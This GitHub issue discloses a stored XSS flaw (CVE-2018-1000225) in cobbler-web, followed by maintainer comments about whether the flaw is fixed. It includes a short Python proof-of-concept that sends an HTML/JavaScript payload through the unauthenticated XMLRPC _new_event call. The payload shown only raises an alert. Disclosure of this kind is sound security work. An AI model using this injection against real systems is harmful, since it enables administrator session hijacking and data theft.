Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Persistent XSS vulnerability in cobbler-web [CVE-2018-1000225] #1917

Open
movermeyer opened this issue Aug 2, 2018 · 2 comments
Open

Persistent XSS vulnerability in cobbler-web [CVE-2018-1000225] #1917

movermeyer opened this issue Aug 2, 2018 · 2 comments

Comments

@movermeyer
Copy link
Contributor

@movermeyer movermeyer commented Aug 2, 2018

cobbler-web renders HTML and executes JavaScript payloads that are provided by users.
Combined with authentication problems in the Cobbler XMLRPC API, this allows unauthenticated users to inject malicious payloads into the web UI.

A harmless Proof of Concept script:

import xmlrpc.client

cobbler_connection = xmlrpc.client.ServerProxy("http://127.0.0.1/cobbler_api", allow_none=True)

payload = """
<button onclick="myFunction()">Click me!</button>

<script>
function myFunction() {
    alert("Hah! you clicked!");
}
</script>
"""

cobbler_connection._new_event(payload)

Then when you visit the cobbler_web/events endpoint:

cobbler_js_event

These payloads can be used to hijack the sessions of administrator and perform actions that the attacker would otherwise be unable to, or to exfiltrate sensitive information.

cobbler-web should sanitize all user provided inputs, and treat them as untrusted. This included never rendering user provided HTML, nor executing user provided JavaScript.

See this post for more discussion.

@movermeyer movermeyer changed the title Persistent XSS vulnerability in cobbler-web Persistent XSS vulnerability in cobbler-web [CVE-2018-1000225] Aug 21, 2018
@meaksh

This comment has been minimized.

Copy link
Contributor

@meaksh meaksh commented Dec 13, 2018

I think this issue could be now considered as fixed since the private _ methods from the XMLRPC API are not exposed anymore. Also modify_settings now requires auth token, so IIUC the issue described here is not longer happening.

@opoplawski

This comment has been minimized.

Copy link
Contributor

@opoplawski opoplawski commented Feb 23, 2019

If this is fixed can we please close this. Also, if this is fixed, what version was it fixed in?

@SchoolGuy SchoolGuy added this to Inbox in Backlog Aug 15, 2019
@SchoolGuy SchoolGuy moved this from Inbox to Bug Reports in Backlog Oct 17, 2019
@SchoolGuy SchoolGuy moved this from Bug Reports to To do in Backlog Oct 24, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
Backlog
  
To do
4 participants
You can’t perform that action at this time.